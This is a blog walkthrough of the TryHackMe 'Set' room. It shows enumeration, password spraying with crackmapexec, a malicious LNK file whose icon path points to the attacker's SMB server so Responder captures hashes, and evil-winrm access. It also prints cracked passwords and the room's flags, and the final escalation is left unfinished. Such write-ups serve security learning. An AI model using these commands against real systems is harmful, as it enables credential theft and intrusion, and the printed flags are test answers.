May 8, 2021
Set TryHackme Walkthrough
By Shamsher khan This is a Writeup of Tryhackme room “Set”
Room link: https://tryhackme.com/room/set
Note: This room is for Premium Members Only. who purchased THM premium membership.
Walkthrough — SetStoryOnce again you find yourself on the internal network of the Windcorp Corporation. This tasted so good last time you were there, you came backfor more. However, they managed to secure the Domain Controller this time, so you need to find another server and your first scan discovered Set.
Set is used as a platform for developers and has had some problems in the recent past. They had to reset a lot of users and restore backups (maybe you were not the only hacker on their network?). So they decided to make sure all users used proper passwords and closed of some of the loose policies.
Can you still find a way in? Are some users more equal than others? Or more sloppy? And maybe you need to think outside the box a little bit to circumvent their new security controls…Happy Hacking! @4nqr34z and @theart42Let’s start with enumeration first.nmapEnum4linux reveals
Let’s start with enumeration first
nmap -p- -sC -sV 10.10.177.99
We have three ports open, MSRPC, HTTPS, and SMB. The results also inform us to add seth.windcorp.thm to our hosts file. There is also a Windows Remote Management port open on 5985 and an additional MSRPC port on 49666. Lets first navigate to the website and then move on to SMB.
Add hostname=set.windcorp.thm to /etc/hosts
HTTPS
Navigating to the homepage of the HTTPS site returns a company website
Directory Searching
gobuster dir -u https://set.windcorp.thm -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
gobuster dir -u https://set.windcorp.thm/assets -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k
These appear to be directories that host the source code of the website, we can snoop around these files in the debugger. Within the source code of the website we can see a hidden section of testimonials with usernames. The hint of the room suggested that they were previously hacked therefore making those usernames valuable.
Visit view-source:https://set.windcorp.thm/assets/data/users.xml
This file contains many usernames belonging to the company.
We can sort these to obtain only the username and brute force valid accounts on the Set domain. The following command downloads the xml file, extracts the usernames, deletes empty spaces and stores them in a text file.
curl -k https://set.windcorp.thm/assets/data/users.xml -o user.xml
Extracting the usernames from users.xml file
xmllint --xpath "//row/email" users.xml | sed -e 's/<email>//g' | sed -e 's/<\/email>//g' | sed -e 's/@windcorp.thm//g'>users.txt
SMB
Using a quick smbclient scan reveals we need credentials to enumerate SMB
We can brute force valid accounts with the usernames we acquired from the website with crackmapexec using the rockyou or common-SSH passwords.
crackmapexec smb set.windcorp.thm -u users.txt -p rockyou.txt
We can see the valid credentials are myrtleowe:Passw@rd
Listing the shares with the new found credentials
smbclient -L \\set.windcorp.thm -U myrtleowe
If we logon to the Files share we see the following.
The Info.txt file is the first flag of the room. We do not yet have access for evil-winrm
Flag1: THM{4c66e2b8d4c45a65e6a7d0c7ad4a5d7ff245dc14}
We are counting on someone unzipping the files, because it says they will review them.Not too commonly known, you can change the icon-path in a LNK-file and point it to a SMB-server capturing the users password-hash
The beauty with this trick, is that the user don’t even has to click the lnk. Opening a window displaying contents of a folder containing such a file, is enough. First we create our lnk, using this excellent tool. http://www.mamachine.org/mslink/index.en.html
Note: Due to some reason i deploy my machine again
machine ip = 10.10.169.112
./mslink_v1.3.sh -l notimportant -n shortcut -i \\\\10.2.12.26\\MichelleWat -o shortcut.lnkzip myfile.zip shortcut.lnk
Start Responder
responder -I tun0Uploading file to share
Search 10.10.169.112 (Machine ip) in browser
yess we got hash
Now crack this hash for user MichelleWat
User: MichelleWat
Password: !!!MICKEYmouse
We try WinRM and this time we are in luck, Install evil-winrm tool
gem install evil-winrm
And Here We got
Flag 2 THM{690798b1780964f5f51cebd854da5a2ea236ebb5}
We spot a listening port we didn’t see from the outside
Let’s investigate the identified process sitting on the PID 4736. It happens that you forget a command syntax (it occurs to me quite often). The PowerShell Get-Help command does the job.
get-process
listening to 2805A bit more research reveals there could be a serious vulnerability using .Net Deserialization
And the version looks really promising indeed!So. We need to get to that port. Port-forwarding user msf? Trying uploading a meterpreter.
We start with uploading plink.exe, one of the command line SSH tools for Windows. Make sure you use the new version!
Downloading plink.exe:
Assuming that we don’t have plink.exe on our Windows Machine, let’s browse to https://www.chiark.greenend.org.uk/~sgtatham/putty/latest.html and download the file:
There are two binaries available; as you can guess, 32-bit and 64-bit (There are also ARM architecture executables for Windows, if you scroll down)
upload plink.exe to deployed machine
python -m SimpleHTTPServer 80Due to my tryhackme subscription expire i couldn’t explore my writeup
So here is
Flag3 : THM{934f7faaadab3b040edab8214789114c9d3049dd}
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
